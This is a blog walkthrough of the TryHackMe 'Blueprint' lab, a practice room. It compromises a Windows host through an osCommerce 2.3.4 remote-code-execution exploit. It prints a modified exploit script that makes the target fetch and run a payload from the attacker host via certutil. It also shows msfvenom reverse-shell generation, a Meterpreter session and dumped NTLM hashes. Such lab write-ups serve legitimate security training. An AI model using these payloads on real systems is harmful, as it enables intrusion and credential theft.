Tryhackme - Blueprint

Tryhackme – Blueprint

In this walk through, we will be going through the Blueprint room from Tryhackme. This room is rated as Easy on the platform and the objective is to hack into this Windows machine and escalate our privileges to Administrator to capture the root flag. So, let’s get started without any delay.

Blueprint

Machine Info:

TitleBlueprint
IPaddress10.10.209.244
DifficultyEasy
ObjectiveHack into this Windows machine and escalate your privileges to Administrator.

Enumeration:

  • I started off with a regular nmap scan with service version detection and found multiple ports opened as it is a Windows machine. Some of the interesting ports were – 80, 8080, 443 (HTTP/HTTPS), 139 and 445 (SMB) and 3306 (MySQL).

sudo nmap -sS -sV 10.10.209.244

nmap scan

  • Enumerated the web server running on port 80 and found a 404 error there.

404 Server error

  • Next, i pivot to port 443 and it has a directory listing enabled where we found out that oscommerce 2.3.4 is being installed on the server.

Index of

  • We can access the same on port 8080.

Welcome to eshop

  • Next, i moved to SMB for enumeration,found a couple of shares however was unable to access them as per smbmap.

smbclient -L 10.10.209.244

smbclient

smbmap -H 10.10.209.244

smbmap access denied

  • Fired gobuster on the oscommerce installation and found bunch of interesting directories.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.209.244:8080/oscommerce-2.3.4/catalog/ -w ~/Desktop/Wordlist/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.209.244:8080/oscommerce-2.3.4/catalog/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/11/29 12:41:49 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 1046]
/.hta                 (Status: 403) [Size: 1046]
/.htpasswd            (Status: 403) [Size: 1046]
/ADMIN                (Status: 301) [Size: 371] [--> 
/Admin                (Status: 301) [Size: 371] [--> 
/Images
/admin                                            
/download           
/ext                                           
/images                                      
/install              (Status: 301) [Size: 373] [--> 
/pub                  (Status: 301) [Size: 369] [-->   

-- snipped --

                        
===============================================================
2023/11/29 12:44:14 Finished
===============================================================

gobuster scan

gobuster scan

  • Next, searched the oscommerce version for known exploits using searchsploit and found a RCE exploit.

searchsploit oscommerce 2.3.4

searchsploit oscommerce 2.3.4

oscommerce 2.3.4.1 - Remote Code Execution

Initial Access:

  • Copied the exploit to my working directory.

searchsploit -m php/webapps/44374.py

copy the exploit

  • Changed the target and base URL in the exploit and executed it. However, the system function was disabled for the security reasons.

changing parameters in exploit

python 44374.py

python exploit

configure.php

  • So, i generated a Windows meterpreter payload using msfvenom named shell.exe. The idea is to download the payload directly on the server using certutil and execute it using the configure.php to get a shell back.

wh1terose@fsociety:~/CTF/TryHackme/Blueprint$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.1.78 LPORT=4444 -f exe -o shell.exe
Running the 'init' command for the database:
Existing database found, attempting to start it
Starting database at /home/wh1terose/.msf4/db...pg_ctl: another server might be running; trying to start server anyway
server starting
success
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe

msfvenom payload generate

  • Made changes to the exploit as per new payload.

import requests

# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
base_url = "http://10.10.209.244:8080/oscommerce-2.3.4/catalog/"
target_url = "http://10.10.209.244:8080/oscommerce-2.3.4/catalog/install/install.php?step=4"

data = {
    'DIR_FS_DOCUMENT_ROOT': './'
}

# the payload will be injected into the configuration file via this code
# '  define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
# so the format for the exploit will be: '); PAYLOAD; /*

payload = '\');'
payload += '$var = shell_exec("cmd.exe /C certutil -urlcache -split -f http://10.18.1.78:8000/shell.exe shell.exe & shell.exe");'  # this is where you enter you PHP payload
payload += 'echo $var;'   
payload += '/*'

data['DB_DATABASE'] = payload

# exploit it
r = requests.post(url=target_url, data=data)

if r.status_code == 200:
    print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
else:
    print("[-] Exploit did not execute as planned")
    print("[-] Exploit did not execute as planned")```

changing parameters in exploit

  • I spin up a webserver hosting our payload and executed our payload. Once i executed the configure.php file, i received a connection back at my Metasploit multi handler with admin privileges.

python exploit

python http server

configure.php

Index of oscommerce 2.3.4

wh1terose@fsociety:~$ msfconsole -q
[*] Starting persistent handler(s)...
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.18.1.78
LHOST => 10.18.1.78
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.18.1.78:4444 
[*] Sending stage (175686 bytes) to 10.10.209.244
[*] Meterpreter session 1 opened (10.18.1.78:4444 -> 10.10.209.244:49477) at 2023-11-29 13:29:53 +0530

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

nt authority/system

Getting Flags:

  • As per the flag requirement, i dumped the users hash using hashdump and cracked the NTLM hash of user “Lab” using Crackstation. Found the password – googleplus.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::

hashdump

Crackstation cracking

  • Finally dumped the root flag and completed the room.

root flag

Task 1 – Blueprint

Question 1 – “Lab” user NTLM hash decrypted

Question 2 – root.txt

Task 1 - Blueprint

Also Read: Tryhackme – 0day

Conclusion:

Conclusion

So that was “Blueprint” for you. We first started with a nmap scan with service version detection flag set and found many ports opened – 80, 8080, 443 (HTTP/HTTPS), 139 and 445 (SMB) and 3306 (MySQL). Next, enumerated the web server on ports 80, 443 and 8080. Found an OS commerce installation. Looked for the known exploits for the os commerce version 2.3.4 and found a RCE exploit. Next, generated a meterpreter payload using msfvenom and used the exploit to upload and execute it on the server giving us a shell back at our handler with root permissions. At last, dumped and cracked the hashes and captured the root flag to complete the room and my first night after marriage. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top